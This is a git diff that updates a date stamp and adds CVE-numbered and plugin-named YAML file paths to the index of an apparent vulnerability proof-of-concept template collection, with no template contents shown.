diff --git a/date.txt b/date.txt
index 5f2357c99f..9093ce495f 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241205
+20241206
diff --git a/poc.txt b/poc.txt
index e7a07433bb..7664237a47 100644
--- a/poc.txt
+++ b/poc.txt
@@ -1051,6 +1051,7 @@
./poc/api/burp-api-detect-812.yaml
./poc/api/burp-api-detect-813.yaml
./poc/api/burp-api-detect.yaml
+./poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
./poc/api/cart-rest-api-for-woocommerce-863e46252f4619353ac6e316726d18cc.yaml
./poc/api/cart-rest-api-for-woocommerce.yaml
./poc/api/clickhouse-api-unauth.yaml
@@ -2647,6 +2648,7 @@
./poc/auth/cookiebot.yaml
./poc/auth/cookiehub-aa4595d84974fda5e2ed2c93116d9b1f.yaml
./poc/auth/cookiehub.yaml
+./poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml
./poc/auth/cookiemonster-b03efd98535cb1491a9c6a9735c7d0eb.yaml
./poc/auth/cookiemonster.yaml
./poc/auth/cookies-and-content-security-policy-01ad7a832bf07caf4715cade7c58a20e.yaml
@@ -4317,6 +4319,7 @@
./poc/auth/mycred-975ce1886c4ca598930d96fa67c4b8de.yaml
./poc/auth/mycred-9c9dcd07bbf18d8b82e863c99230019e.yaml
./poc/auth/mycred-ab15e8f26c6360efdd6040bbe367680e.yaml
+./poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
./poc/auth/mycred-c64e04f4ee706d21106c1d7bac20cb1c.yaml
./poc/auth/mycred-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/auth/mycred-d5c4fcd6192c906be2ff0430f97baff7.yaml
@@ -4592,6 +4595,7 @@
./poc/auth/oracle-people-sign-in-9399.yaml
./poc/auth/oracle-people-sign-in.yaml
./poc/auth/orbiteam-bscw-server-unauthenticated-lfi.yaml
+./poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml
./poc/auth/ov3-online-administration-unauthenticated-lfi.yaml
./poc/auth/paloalto-networks-sso.yaml
./poc/auth/panabit-default-login-9437.yaml
@@ -5477,6 +5481,7 @@
./poc/auth/theme-my-login-c0adcf17190736222b76d990855c6100.yaml
./poc/auth/theme-my-login.yaml
./poc/auth/thingsboard-access-token.yaml
+./poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml
./poc/auth/threatq-login-10756.yaml
./poc/auth/threatq-login-10757.yaml
./poc/auth/threatq-login.yaml
@@ -9144,6 +9149,7 @@
./poc/cve/CVE-2011-4804.yaml
./poc/cve/CVE-2011-4926-1779d9229b83a1399466ae14361bbefb.yaml
./poc/cve/CVE-2011-4926-2088.yaml
+./poc/cve/CVE-2011-4926-2089.yaml
./poc/cve/CVE-2011-4926-2091.yaml
./poc/cve/CVE-2011-4926.yaml
./poc/cve/CVE-2011-4955-2c9bc7dc49f1d6049f053f437b9d7049.yaml
@@ -9177,6 +9183,7 @@
./poc/cve/CVE-2011-5181-2112.yaml
./poc/cve/CVE-2011-5181-2116.yaml
./poc/cve/CVE-2011-5181-2117.yaml
+./poc/cve/CVE-2011-5181-2118.yaml
./poc/cve/CVE-2011-5181-8491a0a59b643c19df3fee90d0e2a8a9.yaml
./poc/cve/CVE-2011-5181.yaml
./poc/cve/CVE-2011-5191-51bd4faa48cb8b323facb932108c5e3b.yaml
@@ -11865,6 +11872,7 @@
./poc/cve/CVE-2016-1000134-2679.yaml
./poc/cve/CVE-2016-1000134-f4029376afda7fca93cc3ed29f8a800b.yaml
./poc/cve/CVE-2016-1000134.yaml
+./poc/cve/CVE-2016-1000135-2681.yaml
./poc/cve/CVE-2016-1000135-2683.yaml
./poc/cve/CVE-2016-1000135-2684.yaml
./poc/cve/CVE-2016-1000135-2685.yaml
@@ -13513,6 +13521,7 @@
./poc/cve/CVE-2018-16206-c31676a05fcabd0345611f3ea7f42c3e.yaml
./poc/cve/CVE-2018-16206.yaml
./poc/cve/CVE-2018-16283-0a28c1c4cc9c5b5aca5acd94bd9b3b69.yaml
+./poc/cve/CVE-2018-16283-3362.yaml
./poc/cve/CVE-2018-16283.yaml
./poc/cve/CVE-2018-16285-c3c8a5c2988068028f0e9e257661ab03.yaml
./poc/cve/CVE-2018-16285.yaml
@@ -13803,6 +13812,7 @@
./poc/cve/CVE-2018-3760.yaml
./poc/cve/CVE-2018-3810-3554.yaml
./poc/cve/CVE-2018-3810-3555.yaml
+./poc/cve/CVE-2018-3810-3557.yaml
./poc/cve/CVE-2018-3810-6de071448d5adb9d4c6352281eb7005f.yaml
./poc/cve/CVE-2018-3810.yaml
./poc/cve/CVE-2018-3811-385c337e25130e5d61f4f32a2f113d5e.yaml
@@ -16193,6 +16203,7 @@
./poc/cve/CVE-2020-8658-0284295106abbcc85275b72b5aa54300.yaml
./poc/cve/CVE-2020-8658.yaml
./poc/cve/CVE-2020-8771-5336.yaml
+./poc/cve/CVE-2020-8771-5339.yaml
./poc/cve/CVE-2020-8771-69608ea8c92bdaaf7f1a2b586a50b63f.yaml
./poc/cve/CVE-2020-8771.yaml
./poc/cve/CVE-2020-8772 (copy 1).yaml
@@ -16618,6 +16629,7 @@
./poc/cve/CVE-2021-24225-bcf995267e90e3cc63f9a02bf6b87efc.yaml
./poc/cve/CVE-2021-24225.yaml
./poc/cve/CVE-2021-24226-5645.yaml
+./poc/cve/CVE-2021-24226-5648.yaml
./poc/cve/CVE-2021-24226-ce003cda2a7fdf989943ff2a7c0fe217.yaml
./poc/cve/CVE-2021-24226.yaml
./poc/cve/CVE-2021-24227-656a26809b7464f324229a4abc1031bd.yaml
@@ -16723,6 +16735,7 @@
./poc/cve/CVE-2021-24273-10f609f202db10a6a9875caf578e9466.yaml
./poc/cve/CVE-2021-24273.yaml
./poc/cve/CVE-2021-24274-5658.yaml
+./poc/cve/CVE-2021-24274-5660.yaml
./poc/cve/CVE-2021-24274-c0de31a7825ac9622f57009054aa149c.yaml
./poc/cve/CVE-2021-24274.yaml
./poc/cve/CVE-2021-24275-5661.yaml
@@ -16788,6 +16801,7 @@
./poc/cve/CVE-2021-24297-22f032ffb815dcd080e766b46019670a.yaml
./poc/cve/CVE-2021-24297.yaml
./poc/cve/CVE-2021-24298-3527710bdd7422152bd92d39233e4083.yaml
+./poc/cve/CVE-2021-24298-5686.yaml
./poc/cve/CVE-2021-24298-5687.yaml
./poc/cve/CVE-2021-24298-5688.yaml
./poc/cve/CVE-2021-24298.yaml
@@ -16828,6 +16842,7 @@
./poc/cve/CVE-2021-24316-2813a1d60b58f7217403cc4e686b51f8.yaml
./poc/cve/CVE-2021-24316-5689.yaml
./poc/cve/CVE-2021-24316-5691.yaml
+./poc/cve/CVE-2021-24316-5695.yaml
./poc/cve/CVE-2021-24316-d168751b238f28a1a68263abeb6f4c7a.yaml
./poc/cve/CVE-2021-24316.yaml
./poc/cve/CVE-2021-24317-dfd9bd55d8a4d4cc599169686f7f08ba.yaml
@@ -17242,6 +17257,7 @@
./poc/cve/CVE-2021-24509-9e53895ae638a7e8cfc6fe7e1599f34c.yaml
./poc/cve/CVE-2021-24509.yaml
./poc/cve/CVE-2021-24510-5758.yaml
+./poc/cve/CVE-2021-24510-5759.yaml
./poc/cve/CVE-2021-24510-6c28986cc17c5644f049342400ae6c18.yaml
./poc/cve/CVE-2021-24510.yaml
./poc/cve/CVE-2021-24511-bb2ec5de3b1fb9084a4e4bc2f40c53b6.yaml
@@ -17899,6 +17915,7 @@
./poc/cve/CVE-2021-24838-193631008f48769f14ce31f773b10581.yaml
./poc/cve/CVE-2021-24838-5767.yaml
./poc/cve/CVE-2021-24838-5768.yaml
+./poc/cve/CVE-2021-24838-5769.yaml
./poc/cve/CVE-2021-24838.yaml
./poc/cve/CVE-2021-24839-b54cf1fedbcdd93956474a85392276cb.yaml
./poc/cve/CVE-2021-24839.yaml
@@ -20580,6 +20597,7 @@
./poc/cve/CVE-2022-1605.yaml
./poc/cve/CVE-2022-1608-7d106179563c4124306bf651834445b6.yaml
./poc/cve/CVE-2022-1608.yaml
+./poc/cve/CVE-2022-1609(1).yaml
./poc/cve/CVE-2022-1609-b8b166aada92410fb1f2f9b2f53918ca.yaml
./poc/cve/CVE-2022-1609.yaml
./poc/cve/CVE-2022-1610-fff8ab2c8c6bb0ed58b0b33dc7b8e8cb.yaml
@@ -26266,6 +26284,7 @@
./poc/cve/CVE-2023-2414.yaml
./poc/cve/CVE-2023-2415-5de376ba13565bd67530c98131e13dd3.yaml
./poc/cve/CVE-2023-2415.yaml
+./poc/cve/CVE-2023-2416-b6e308449e56a72318f3547f11c5f544.yaml
./poc/cve/CVE-2023-2416-d2ec2eed287e58f90d3c86cbb07595d1.yaml
./poc/cve/CVE-2023-2416.yaml
./poc/cve/CVE-2023-24243.yaml
@@ -34210,6 +34229,7 @@
./poc/cve/CVE-2024-0678.yaml
./poc/cve/CVE-2024-0679-ee501df61dac24ab9c37a22889e58e87.yaml
./poc/cve/CVE-2024-0679.yaml
+./poc/cve/CVE-2024-0680-0ba13fa9274659992e0f27178c53ade5.yaml
./poc/cve/CVE-2024-0680-9313796b24a8fcfd217ef8d1a90a8725.yaml
./poc/cve/CVE-2024-0680.yaml
./poc/cve/CVE-2024-0681-133acab13d9998d70956a30cfed544d4.yaml
@@ -34481,6 +34501,7 @@
./poc/cve/CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29.yaml
./poc/cve/CVE-2024-10055.yaml
./poc/cve/CVE-2024-10056-a8d2a1d47ca5a0c2f053a977af04fb8c.yaml
+./poc/cve/CVE-2024-10056.yaml
./poc/cve/CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3.yaml
./poc/cve/CVE-2024-10057.yaml
./poc/cve/CVE-2024-10078-ac3355172629b828c0c05e8735d48816.yaml
@@ -34535,6 +34556,7 @@
./poc/cve/CVE-2024-10177-cd099857e17e9d5daf937c4caff0288e.yaml
./poc/cve/CVE-2024-10177.yaml
./poc/cve/CVE-2024-10178-8d00ef32d8cfb13b51bc10bd4d6d2d45.yaml
+./poc/cve/CVE-2024-10178.yaml
./poc/cve/CVE-2024-10179-99e78b7be5cf73a1cef31eb112268c96.yaml
./poc/cve/CVE-2024-10179.yaml
./poc/cve/CVE-2024-10180-cda9906f3b0afcef720a2edb145ba669.yaml
@@ -34566,6 +34588,7 @@
./poc/cve/CVE-2024-10233.yaml
./poc/cve/CVE-2024-10245-36e3bfba2394d4b95bdad2a14d8741f6.yaml
./poc/cve/CVE-2024-10245.yaml
+./poc/cve/CVE-2024-10247-7e9248f7d08a8c804a85ce87492c023b.yaml
./poc/cve/CVE-2024-10250-381303a6df453508271ce4a14d6f5e15.yaml
./poc/cve/CVE-2024-10250.yaml
./poc/cve/CVE-2024-10260-0f500cb04d1d9154639ea4ef28029202.yaml
@@ -34603,6 +34626,7 @@
./poc/cve/CVE-2024-10316.yaml
./poc/cve/CVE-2024-10319-5c0b2e6241c7af29d146faf4b6581f3b.yaml
./poc/cve/CVE-2024-10319.yaml
+./poc/cve/CVE-2024-10320-f49b48a1fa24c03d49f1d0779bc05074.yaml
./poc/cve/CVE-2024-10323-3b68b4ce641de125944f01ebe9a88071.yaml
./poc/cve/CVE-2024-10323.yaml
./poc/cve/CVE-2024-10325-402ce314182729d314273aac0547c13d.yaml
@@ -34692,6 +34716,7 @@
./poc/cve/CVE-2024-1051.yaml
./poc/cve/CVE-2024-10515-5613c1285c13db3e8e7567a1d6eaba45.yaml
./poc/cve/CVE-2024-10515.yaml
+./poc/cve/CVE-2024-10516-90da3b799283fae5783fef07a67bdeef.yaml
./poc/cve/CVE-2024-10519-e4ed2d5cfcede1f54bb2e43cfa2269d7.yaml
./poc/cve/CVE-2024-10519.yaml
./poc/cve/CVE-2024-10520-e565e8010591b8cf25b393d5f18f3d3c.yaml
@@ -34751,6 +34776,7 @@
./poc/cve/CVE-2024-10577-03e59e27ad2ae9ca6f8945bd8581720d.yaml
./poc/cve/CVE-2024-10577-c910dfbedc2df85177b53310160d01a7.yaml
./poc/cve/CVE-2024-10577.yaml
+./poc/cve/CVE-2024-10578-6bc0121b7a6d48f214b8939cb1f78d29.yaml
./poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml
./poc/cve/CVE-2024-10579.yaml
./poc/cve/CVE-2024-1058-ee29f13d5975fd520360e5ea7be92c39.yaml
@@ -34831,6 +34857,7 @@
./poc/cve/CVE-2024-10677.yaml
./poc/cve/CVE-2024-1068-9cafdd7123cc13ec1ddd7f5534904f5e.yaml
./poc/cve/CVE-2024-1068.yaml
+./poc/cve/CVE-2024-10681-074ccd2e143d120107ec916d21cfe73a.yaml
./poc/cve/CVE-2024-10682-845790654070752f55040438702d276d.yaml
./poc/cve/CVE-2024-10682-99be99ab3c687f004931a9abe6a2c2f0.yaml
./poc/cve/CVE-2024-10682.yaml
@@ -34846,8 +34873,10 @@
./poc/cve/CVE-2024-10687.yaml
./poc/cve/CVE-2024-10688-4e865d55bfaf7ccff8ab4229b44e4c7b.yaml
./poc/cve/CVE-2024-10688.yaml
+./poc/cve/CVE-2024-10689-ec644bcff6b8252f58e7ce0b4795467c.yaml
./poc/cve/CVE-2024-1069-eade4f165a3dd4a95074ea430cf7d5a1.yaml
./poc/cve/CVE-2024-1069.yaml
+./poc/cve/CVE-2024-10692-c75c741c420e4c515c59f2646be4e222.yaml
./poc/cve/CVE-2024-10693-c432d0b08f287a25140732c41d4a1ed1.yaml
./poc/cve/CVE-2024-10693.yaml
./poc/cve/CVE-2024-10695-d3f51a21505172dd3b75517abc1cda80.yaml
@@ -34888,6 +34917,7 @@
./poc/cve/CVE-2024-10770-c34a4a3efec7f5f02bdebaace96e792d.yaml
./poc/cve/CVE-2024-10770.yaml
./poc/cve/CVE-2024-10777-3d0f2c41b4182831f7340ab1eb913016.yaml
+./poc/cve/CVE-2024-10777.yaml
./poc/cve/CVE-2024-10778-797064adc3334f08c3fbb1275f7b3b47.yaml
./poc/cve/CVE-2024-10778-fd80b84e6e4bfedee7b8d137c9c72b1b.yaml
./poc/cve/CVE-2024-10778.yaml
@@ -34954,9 +34984,12 @@
./poc/cve/CVE-2024-1083.yaml
./poc/cve/CVE-2024-10832-08cd101251aa1a9d6856998524059503.yaml
./poc/cve/CVE-2024-10832.yaml
+./poc/cve/CVE-2024-10836-e5372e893ae8325e3b297cc93a19837f.yaml
./poc/cve/CVE-2024-10837-822bdf929bf75cae072305d22ba83f9d.yaml
./poc/cve/CVE-2024-10837.yaml
./poc/cve/CVE-2024-10848-7435d35ca01d98267edea517a3f5f67d.yaml
+./poc/cve/CVE-2024-10848.yaml
+./poc/cve/CVE-2024-10849-c4f62162d556d3b337dc88f33abf0608.yaml
./poc/cve/CVE-2024-10850-1086df4e1d6f59239e6e41cb5264dfd9.yaml
./poc/cve/CVE-2024-10850-1914522a12aa125c7663504eb5d5805e.yaml
./poc/cve/CVE-2024-10850.yaml
@@ -34986,6 +35019,7 @@
./poc/cve/CVE-2024-10872.yaml
./poc/cve/CVE-2024-10873-4dd27e8fb81cdeee3e70714a8ad3eb71.yaml
./poc/cve/CVE-2024-10873.yaml
+./poc/cve/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml
./poc/cve/CVE-2024-10874-f04e19edf59553c6a738cb353e8b2d2f.yaml
./poc/cve/CVE-2024-10874.yaml
./poc/cve/CVE-2024-10875-45b6168ef90063fd32579a018f9eb47d.yaml
@@ -34996,11 +35030,13 @@
./poc/cve/CVE-2024-10877.yaml
./poc/cve/CVE-2024-10878-2a6958b657c7efaf0d338a4aea9db038.yaml
./poc/cve/CVE-2024-10878.yaml
+./poc/cve/CVE-2024-10879-fdafc38df20050c33f2864a1f7138f44.yaml
./poc/cve/CVE-2024-1088-58bbbe61468292a1146bbabf2501df14.yaml
./poc/cve/CVE-2024-1088.yaml
./poc/cve/CVE-2024-10880-59c0038e0af4d28442c891a27a66f569.yaml
./poc/cve/CVE-2024-10880.yaml
./poc/cve/CVE-2024-10881-596695d2d6cc01668d710d28f9523f24.yaml
+./poc/cve/CVE-2024-10881.yaml
./poc/cve/CVE-2024-10882-e797660f97ef668cb301cb3b9715bd4a.yaml
./poc/cve/CVE-2024-10882.yaml
./poc/cve/CVE-2024-10883-a21949176ab6e3c686e7a07e748a996d.yaml
@@ -35032,6 +35068,7 @@
./poc/cve/CVE-2024-1090.yaml
./poc/cve/CVE-2024-10900-15161f64578c8a72d2a1b43a0155d517.yaml
./poc/cve/CVE-2024-10900.yaml
+./poc/cve/CVE-2024-10909-308c66fb506ba01c372d73eaeb9b223a.yaml
./poc/cve/CVE-2024-1091-cebf822ed68805638f7571c8df635233.yaml
./poc/cve/CVE-2024-1091.yaml
./poc/cve/CVE-2024-10913-293ddeaa8a2577b31fabdbc30afdd8d5.yaml
@@ -35046,6 +35083,7 @@
./poc/cve/CVE-2024-1093-7c034f664d389dd1d4714fd38e3096f8.yaml
./poc/cve/CVE-2024-1093.yaml
./poc/cve/CVE-2024-10937-e65765a33d97e7492f011b63b4951ffc.yaml
+./poc/cve/CVE-2024-10937.yaml
./poc/cve/CVE-2024-1094-28bbaf5febf22938e52d5e0ad45af461.yaml
./poc/cve/CVE-2024-1094.yaml
./poc/cve/CVE-2024-1095-741eaa5507c75edbe90bc3ba4e40e5a9.yaml
@@ -35054,6 +35092,7 @@
./poc/cve/CVE-2024-10952.yaml
./poc/cve/CVE-2024-10958-b9e22eaad7c9ca71f94e8afa6dc3ff9c.yaml
./poc/cve/CVE-2024-10958.yaml
+./poc/cve/CVE-2024-10961-60fb90d65f9868b90bab1ea437eb89b3.yaml
./poc/cve/CVE-2024-10961-c22c374f4ffe67db892c953e4cf45c93.yaml
./poc/cve/CVE-2024-10961.yaml
./poc/cve/CVE-2024-10962-b5d6c73fa07a42d3299578c2a0d3f408.yaml
@@ -35119,6 +35158,7 @@
./poc/cve/CVE-2024-11150.yaml
./poc/cve/CVE-2024-11154-529b37d71d1c447f23821a8d5e5c09ec.yaml
./poc/cve/CVE-2024-11154.yaml
+./poc/cve/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
./poc/cve/CVE-2024-11179-1e778ca562fc16e9c8b2cbe854f17d8d.yaml
./poc/cve/CVE-2024-11179.yaml
./poc/cve/CVE-2024-1118-d2488e79cdb18e5fa6f4b114e5fd1973.yaml
@@ -35144,6 +35184,7 @@
./poc/cve/CVE-2024-1120.yaml
./poc/cve/CVE-2024-11200-2ed75e0618faa276dda0258a435ea9ca.yaml
./poc/cve/CVE-2024-11200.yaml
+./poc/cve/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml
./poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml
./poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml
./poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml
@@ -35154,6 +35195,7 @@
./poc/cve/CVE-2024-11202.yaml
./poc/cve/CVE-2024-11203-1cd59b8fc753c6adcd4897a2127aa88d.yaml
./poc/cve/CVE-2024-11203.yaml
+./poc/cve/CVE-2024-11204-f87aa22c9bcd426fec72b8003f96482e.yaml
./poc/cve/CVE-2024-1121-f9acdd7e5d4400d7ac2f5c1f64969230.yaml
./poc/cve/CVE-2024-1121.yaml
./poc/cve/CVE-2024-11219-048b6dca7f14c30180d7d2d9e7d023ad.yaml
@@ -35188,19 +35230,24 @@
./poc/cve/CVE-2024-11265.yaml
./poc/cve/CVE-2024-1127-96dba372bfefb2c18f635a1075e27756.yaml
./poc/cve/CVE-2024-1127.yaml
+./poc/cve/CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml
./poc/cve/CVE-2024-11277-371669e41b1bdbea10af14d85581448c.yaml
./poc/cve/CVE-2024-11277.yaml
./poc/cve/CVE-2024-11278-f2f3b28a1bbcb829b720cfe84f4bb1fb.yaml
./poc/cve/CVE-2024-11278.yaml
./poc/cve/CVE-2024-1128-67d8835f2e0e8ac11d097612ad9e363c.yaml
./poc/cve/CVE-2024-1128.yaml
+./poc/cve/CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb.yaml
./poc/cve/CVE-2024-1129-0aba491c9fa777fb284efdb308d0b368.yaml
./poc/cve/CVE-2024-1129.yaml
+./poc/cve/CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b.yaml
./poc/cve/CVE-2024-11293-445cfc68523ff32c33fa3e493bbbe08c.yaml
./poc/cve/CVE-2024-11293.yaml
./poc/cve/CVE-2024-1130-098b26182013dbcd4e8583ec0a56cb16.yaml
./poc/cve/CVE-2024-1130.yaml
+./poc/cve/CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f.yaml
./poc/cve/CVE-2024-11324-744eea132cf5114313c8cf238c08e606.yaml
+./poc/cve/CVE-2024-11324.yaml
./poc/cve/CVE-2024-11325-316ac125b380ef0e67ba0167790d2d3b.yaml
./poc/cve/CVE-2024-11325.yaml
./poc/cve/CVE-2024-11326-0c8fabfd859db33f6ff486f4e38a0506.yaml
@@ -35215,11 +35262,15 @@
./poc/cve/CVE-2024-11333.yaml
./poc/cve/CVE-2024-11334-0b8da3e1689c4970bc8a08684dc2b879.yaml
./poc/cve/CVE-2024-11334.yaml
+./poc/cve/CVE-2024-11336-3e061f8446314ee414179038a3da58ff.yaml
+./poc/cve/CVE-2024-11339-5fa325846534729a9ee06c7b2d86ccc1.yaml
./poc/cve/CVE-2024-1134-80f4a43eaea90aa0c6452abac73a271e.yaml
./poc/cve/CVE-2024-1134.yaml
./poc/cve/CVE-2024-11341-d9c0a662afec84fc95603ed54f2aec86.yaml
+./poc/cve/CVE-2024-11341.yaml
./poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml
./poc/cve/CVE-2024-11342.yaml
+./poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml
./poc/cve/CVE-2024-11354-0e62ca18f9bdb0611f368a7276263f85.yaml
./poc/cve/CVE-2024-11354.yaml
./poc/cve/CVE-2024-11355-edf82e64900042596ef0c5f92c74100e.yaml
@@ -35237,11 +35288,13 @@
./poc/cve/CVE-2024-11365.yaml
./poc/cve/CVE-2024-11366-cc7c5723ad039e93a1f894e0ec9c21a6.yaml
./poc/cve/CVE-2024-11366.yaml
+./poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml
./poc/cve/CVE-2024-11370-8905f30acaa5202d5d378bf4d5583236.yaml
./poc/cve/CVE-2024-11370-b85fbeb5ce3fb349473e622007a9f53a.yaml
./poc/cve/CVE-2024-11370.yaml
./poc/cve/CVE-2024-11371-95a048e99cf0968d3759cd47fec02e09.yaml
./poc/cve/CVE-2024-11371.yaml
+./poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml
./poc/cve/CVE-2024-11381-4ba6eeaab054e0e01702e7251bb00372.yaml
./poc/cve/CVE-2024-11381.yaml
./poc/cve/CVE-2024-11385-43829d07561569d5ecaceb7ea47ba97c.yaml
@@ -35273,6 +35326,7 @@
./poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml
./poc/cve/CVE-2024-11418.yaml
./poc/cve/CVE-2024-11420-2826e6328a5500d4faa1dc190ffc98cc.yaml
+./poc/cve/CVE-2024-11420.yaml
./poc/cve/CVE-2024-11424-1220902dc85195463b8e6b1e1cc1470c.yaml
./poc/cve/CVE-2024-11424.yaml
./poc/cve/CVE-2024-11426-ada6fe273d3c0447cca6a4f9c17bc628.yaml
@@ -35280,6 +35334,7 @@
./poc/cve/CVE-2024-11428-f836c627b4521637a2e87c9552fd2a57.yaml
./poc/cve/CVE-2024-11428.yaml
./poc/cve/CVE-2024-11429-f2942bb3824b4d9b7780f8fbd0f14593.yaml
+./poc/cve/CVE-2024-11429.yaml
./poc/cve/CVE-2024-11431-28e640b1d4d500562eca3cb2f0498909.yaml
./poc/cve/CVE-2024-11431.yaml
./poc/cve/CVE-2024-11432-5ab33a7cf49791cb848b0e8a8b92d04f.yaml
@@ -35291,10 +35346,12 @@
./poc/cve/CVE-2024-11438.yaml
./poc/cve/CVE-2024-11440-b26a27e98ac4778bf1db64f0d89b26d0.yaml
./poc/cve/CVE-2024-11440.yaml
+./poc/cve/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml
./poc/cve/CVE-2024-11446-3888215e68990f5f74ea66a863aea2dd.yaml
./poc/cve/CVE-2024-11446.yaml
./poc/cve/CVE-2024-11447-053ad392530025b6e52689e2d755cb20.yaml
./poc/cve/CVE-2024-11447.yaml
+./poc/cve/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
./poc/cve/CVE-2024-11453-fa7409a899cdcce4323f76f911032569.yaml
./poc/cve/CVE-2024-11453.yaml
./poc/cve/CVE-2024-11455-20245b95e832be32aa78c5dcdb250fbb.yaml
@@ -35304,6 +35361,7 @@
./poc/cve/CVE-2024-11456.yaml
./poc/cve/CVE-2024-11458-06c2883fbed5c08d970a9ed931a3e19e.yaml
./poc/cve/CVE-2024-11458.yaml
+./poc/cve/CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f.yaml
./poc/cve/CVE-2024-11461-79c81f7450c8a8210454f180a585b023.yaml
./poc/cve/CVE-2024-11461.yaml
./poc/cve/CVE-2024-11463-0bf104abede23adeb8af80d1e15ce8a5.yaml
@@ -35314,6 +35372,7 @@
./poc/cve/CVE-2024-1157.yaml
./poc/cve/CVE-2024-1158-c524eecd9e35e784bb852f087dadba65.yaml
./poc/cve/CVE-2024-1158.yaml
+./poc/cve/CVE-2024-11585-2cea61d12b0cef27d38be3d7af3bdcdf.yaml
./poc/cve/CVE-2024-1159-e1be592d0538ff54babfcfb35ba5c078.yaml
./poc/cve/CVE-2024-1159.yaml
./poc/cve/CVE-2024-1160-6f8b52f63a7418371b1b3b9ca6d3a448.yaml
@@ -35341,6 +35400,7 @@
./poc/cve/CVE-2024-11684.yaml
./poc/cve/CVE-2024-11685-a8b92c4479bf790f7f0a4e95c7b55344.yaml
./poc/cve/CVE-2024-11685.yaml
+./poc/cve/CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6.yaml
./poc/cve/CVE-2024-1169-007e07b24673895c34505297aed33632.yaml
./poc/cve/CVE-2024-1169.yaml
./poc/cve/CVE-2024-1170-319ccaea8169c279380313a5b41bae50.yaml
@@ -35351,8 +35411,11 @@
./poc/cve/CVE-2024-1171.yaml
./poc/cve/CVE-2024-1172-39dfeb3662991e9d246c7171e032fdd6.yaml
./poc/cve/CVE-2024-1172.yaml
+./poc/cve/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml
+./poc/cve/CVE-2024-11729-fc3745f8e039decbc81308be45aacd79.yaml
./poc/cve/CVE-2024-1173-9e9606db29cc691b1619adba347c82df.yaml
./poc/cve/CVE-2024-1173.yaml
+./poc/cve/CVE-2024-11730-2e1143d8e0f261dcfb3953128e8fb707.yaml
./poc/cve/CVE-2024-11732-6300c1dae27be21acd061d5288a24196.yaml
./poc/cve/CVE-2024-11732.yaml
./poc/cve/CVE-2024-11747-62f3cf7911a4e9abbe89a873183d1c75.yaml
@@ -35370,6 +35433,7 @@
./poc/cve/CVE-2024-1177-44b068407f4a1063af5594e6bad17afb.yaml
./poc/cve/CVE-2024-1177.yaml
./poc/cve/CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml
+./poc/cve/CVE-2024-11779.yaml
./poc/cve/CVE-2024-1178-26b664c2c5e2ce23e9059d41408b3b04.yaml
./poc/cve/CVE-2024-1178.yaml
./poc/cve/CVE-2024-11782-14c12bf1c0b93e64d33c585eee3be338.yaml
@@ -35388,6 +35452,7 @@
./poc/cve/CVE-2024-11813.yaml
./poc/cve/CVE-2024-11814-d146dcbc7cba6beb9447aebeae90eb88.yaml
./poc/cve/CVE-2024-11814.yaml
+./poc/cve/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
./poc/cve/CVE-2024-1183.yaml
./poc/cve/CVE-2024-11844-07ec12dfcaf6ca937ccce1eaaff746ba.yaml
./poc/cve/CVE-2024-11844.yaml
@@ -35413,6 +35478,9 @@
./poc/cve/CVE-2024-11935.yaml
./poc/cve/CVE-2024-11952-16ad33d112d4e8604b5e9b540af90fd8.yaml
./poc/cve/CVE-2024-11952.yaml
+./poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml
+./poc/cve/CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml
+./poc/cve/CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b.yaml
./poc/cve/CVE-2024-1203-cede147cec5ebe1dea014170dd370ad1.yaml
./poc/cve/CVE-2024-1203.yaml
./poc/cve/CVE-2024-1204-71ef2dafaa4ce9d17d3dff19cd522221.yaml
@@ -35421,6 +35489,7 @@
./poc/cve/CVE-2024-1205.yaml
./poc/cve/CVE-2024-1206-6b0dd76adaa2c8efc4ee8d32327a4705.yaml
./poc/cve/CVE-2024-1206.yaml
+./poc/cve/CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e.yaml
./poc/cve/CVE-2024-12062-e6f7834c3eb1eb9aabc9534922a2b0a2.yaml
./poc/cve/CVE-2024-12062.yaml
./poc/cve/CVE-2024-1207-9fc726e35e00675f40b1bb34bea36c9b.yaml
@@ -35433,11 +35502,13 @@
./poc/cve/CVE-2024-12099.yaml
./poc/cve/CVE-2024-1210-c4ebf3e8de4f3a2f2f0803da094f581c.yaml
./poc/cve/CVE-2024-1210.yaml
+./poc/cve/CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa.yaml
